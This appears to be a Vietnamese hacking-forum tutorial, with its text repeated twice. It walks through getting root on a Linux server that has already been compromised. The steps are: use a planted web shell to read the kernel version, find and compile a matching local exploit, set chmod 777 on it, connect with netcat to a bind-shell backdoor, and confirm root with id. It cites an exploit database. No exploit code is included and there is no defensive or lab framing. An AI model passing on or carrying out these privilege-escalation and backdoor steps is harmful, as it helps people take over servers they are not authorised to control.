Công Cụ
Shell
Netcat
Exploit
Đầu tiên trong ô run command của shell gõ:
uname -a
Nó sẽ hiện ra phiên bản linux:
Linux 2.6.18-194.11.1.el5PAE #1 SMP Tue Aug 10 19:48:16 EDT 2009 i686 i686 i386 GNU/Linux
Chúng ta search exploit này, sau đó lưu dưới dạng file.c
Run command:
gcc filename.c -o filename
Mở hết quyền cho file này:
chmod 777 filename
Bất netcat đã mở cổng và backdoor từ shell
C:\nc
nc IP port
ex:
nc 127.0.0.1 7777
Nếu thành công thì sẽ hiện:
:: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::
Tiếp tục:
id
Khi nó hiện:
id=root gid=root groups=root
là thành công!
1 số video get root
1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
Qinory
Shell
Netcat
Exploit
Đầu tiên trong ô run command của shell gõ:
uname -a
Nó sẽ hiện ra phiên bản linux:
Linux 2.6.18-194.11.1.el5PAE #1 SMP Tue Aug 10 19:48:16 EDT 2009 i686 i686 i386 GNU/Linux
Chúng ta search exploit này, sau đó lưu dưới dạng file.c
Run command:
gcc filename.c -o filename
Mở hết quyền cho file này:
chmod 777 filename
Bất netcat đã mở cổng và backdoor từ shell
C:\nc
nc IP port
ex:
nc 127.0.0.1 7777
Nếu thành công thì sẽ hiện:
:: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::
Tiếp tục:
id
Khi nó hiện:
id=root gid=root groups=root
là thành công!
1 số video get root
1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
Qinory